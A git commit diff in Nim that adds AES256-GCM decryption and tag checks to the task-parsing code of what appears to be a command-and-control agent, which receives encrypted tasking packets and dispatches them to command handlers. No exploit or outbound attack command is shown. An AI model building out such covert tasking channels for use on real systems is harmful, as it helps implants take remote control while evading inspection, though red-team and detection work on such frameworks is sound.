Implemented AES256-GCM encryption of all network packets. Requires some more refactoring to remove redundant code and make it cleaner.

This commit is contained in:
Jakob Friedl
2025-07-23 13:47:37 +02:00
parent 36719dd7f0
commit 0f065f41a2
16 changed files with 298 additions and 207 deletions

View File

@@ -1,7 +1,7 @@
import strutils, tables, json, strformat
import strutils, tables, json, strformat, sugar
import ../commands/commands
import ../../../common/[types, serialize, utils]
import ../../../common/[types, serialize, crypto, utils]
proc handleTask*(config: AgentConfig, task: Task): TaskResult =
@@ -20,40 +20,34 @@ proc handleTask*(config: AgentConfig, task: Task): TaskResult =
# Handle task command
return handlers[cast[CommandType](task.command)](config, task)
proc deserializeTask*(bytes: seq[byte]): Task =
proc deserializeTask*(config: AgentConfig, bytes: seq[byte]): Task =
var unpacker = initUnpacker(bytes.toString)
let
magic = unpacker.getUint32()
version = unpacker.getUint8()
packetType = unpacker.getUint8()
flags = unpacker.getUint16()
seqNr = unpacker.getUint32()
size = unpacker.getUint32()
hmacBytes = unpacker.getBytes(16)
# Explicit conversion from seq[byte] to array[16, byte]
var hmac: array[16, byte]
copyMem(hmac.addr, hmacBytes[0].unsafeAddr, 16)
let header = unpacker.unpackHeader()
# Packet Validation
if magic != MAGIC:
if header.magic != MAGIC:
raise newException(CatchableError, "Invalid magic bytes.")
if packetType != cast[uint8](MSG_TASK):
if header.packetType != cast[uint8](MSG_TASK):
raise newException(CatchableError, "Invalid packet type.")
# TODO: Validate sequence number
# TODO: Validate HMAC
# Decrypt payload
let payload = unpacker.getBytes(int(header.size))
# TODO: Decrypt payload
# let payload = unpacker.getBytes(size)
let (decData, gmac) = decrypt(config.sessionKey, header.iv, payload, header.seqNr)
if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for task.")
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)
let
taskId = unpacker.getUint32()
agentId = unpacker.getUint32()
listenerId = unpacker.getUint32()
timestamp = unpacker.getUint32()
command = unpacker.getUint16()
@@ -68,17 +62,8 @@ proc deserializeTask*(bytes: seq[byte]): Task =
inc i
return Task(
header: Header(
magic: magic,
version: version,
packetType: packetType,
flags: flags,
seqNr: seqNr,
size: size,
hmac: hmac
),
header: header,
taskId: taskId,
agentId: agentId,
listenerId: listenerId,
timestamp: timestamp,
command: command,
@@ -86,7 +71,7 @@ proc deserializeTask*(bytes: seq[byte]): Task =
args: args
)
proc deserializePacket*(packet: string): seq[Task] =
proc deserializePacket*(config: AgentConfig, packet: string): seq[Task] =
result = newSeq[Task]()
@@ -104,6 +89,6 @@ proc deserializePacket*(packet: string): seq[Task] =
taskLength = unpacker.getUint32()
taskBytes = unpacker.getBytes(int(taskLength))
result.add(deserializeTask(taskBytes))
result.add(config.deserializeTask(taskBytes))
dec taskCount